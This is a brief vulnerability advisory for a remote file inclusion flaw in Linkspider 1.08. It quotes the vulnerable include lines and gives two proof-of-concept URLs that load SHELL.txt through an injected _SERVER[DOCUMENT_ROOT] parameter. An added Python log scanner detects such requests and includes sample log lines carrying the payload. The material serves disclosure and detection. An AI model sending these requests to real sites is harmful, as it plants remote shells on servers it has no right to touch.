Linkspider version 1.08 suffers from a remote file inclusion vulnerability.
=============================================================
Linkspider v.1.08 Remote File Include Vulnerability
==============================================================
App Name : Linkspider v.1.08
HomePage : http://www.phoenix.frihost.net/linkspider/read_me.php
Vulnerability Discovered by : Rohit Bansal
Vuln Code:
----------------
links.php
include_once ($_SERVER['DOCUMENT_ROOT'] . "/linkspider/admin/custom.php");
also in
links.inc.php
include_once ($_SERVER['DOCUMENT_ROOT'] . "/linkspider/admin/custom.php");
POC:
---------------
http://site.com/[path]/links.php?_SERVER[DOCUMENT_ROOT]=SHELL.txt
http://site.com/[path]/links.inc.php?_SERVER[DOCUMENT_ROOT]=SHELL.txt
rohitisback[at]gmail.com
================================================================
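A log check for requests of the shape shown in the POC, as an added example that is not part of the original advisory: it flags query-string parameters whose name is a PHP superglobal such as `_SERVER[DOCUMENT_ROOT]`, whether the brackets arrive raw or percent-encoded. The log lines, client addresses and the `cat` and `q` parameters are constructed samples, and the function names are this example's own.

```python
import re
from urllib.parse import unquote

# PHP superglobal names; none should ever arrive as a request parameter name.
SUPERGLOBALS = ("_SERVER", "_GET", "_POST", "_COOKIE", "_FILES", "_ENV",
                "_REQUEST", "_SESSION", "GLOBALS")
PARAM_RE = re.compile(r"^(?:%s)(?:\[|$)" % "|".join(SUPERGLOBALS))
# Common/combined log format: client ... "METHOD target HTTP/x" status
REQUEST_RE = re.compile(r'^(\S+) .*?"[A-Z]+ (\S+) HTTP/[\d.]+" (\d{3})')

# Constructed sample access-log lines (documentation address ranges).
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2024:10:00:00 +0000] "GET /linkspider/links.php?cat=3 HTTP/1.1" 200 5120',
    '198.51.100.7 - - [01/Jan/2024:10:00:05 +0000] "GET /linkspider/links.php?_SERVER[DOCUMENT_ROOT]=x HTTP/1.1" 200 312',
    '198.51.100.7 - - [01/Jan/2024:10:00:06 +0000] "GET /linkspider/links.inc.php?_SERVER%5BDOCUMENT_ROOT%5D=x HTTP/1.1" 200 312',
    '198.51.100.7 - - [01/Jan/2024:10:00:07 +0000] "GET /linkspider/links.php?_SERVER%255BDOCUMENT_ROOT%255D=x HTTP/1.1" 404 0',
    '203.0.113.4 - - [01/Jan/2024:10:01:00 +0000] "GET /search.php?q=_SERVER HTTP/1.1" 200 900',
]

def decode_fully(text, rounds=3):
    """Percent-decode repeatedly so %5B and %255B both end up as '['."""
    for _ in range(rounds):
        decoded = unquote(text)
        if decoded == text:
            break
        text = decoded
    return text

def superglobal_params(target):
    """Return query parameter names in a request target that address a superglobal."""
    query = target.partition("?")[2]
    hits = []
    for pair in re.split(r"[&;]", query):
        # Only the parameter name matters; a value such as q=_SERVER is harmless.
        name = decode_fully(pair.split("=", 1)[0]).lstrip()
        if PARAM_RE.match(name):
            hits.append(name)
    return hits

def scan(lines):
    """Return (client, status, target, names) for every log line worth a look."""
    findings = []
    for line in lines:
        m = REQUEST_RE.match(line)
        if not m:
            continue  # not an access-log request line
        client, target, status = m.groups()
        names = superglobal_params(target)
        if names:
            findings.append((client, int(status), target, names))
    return findings
```

The same name-based match can back a request filter placed in front of the application, since no legitimate client sends a parameter named after a superglobal.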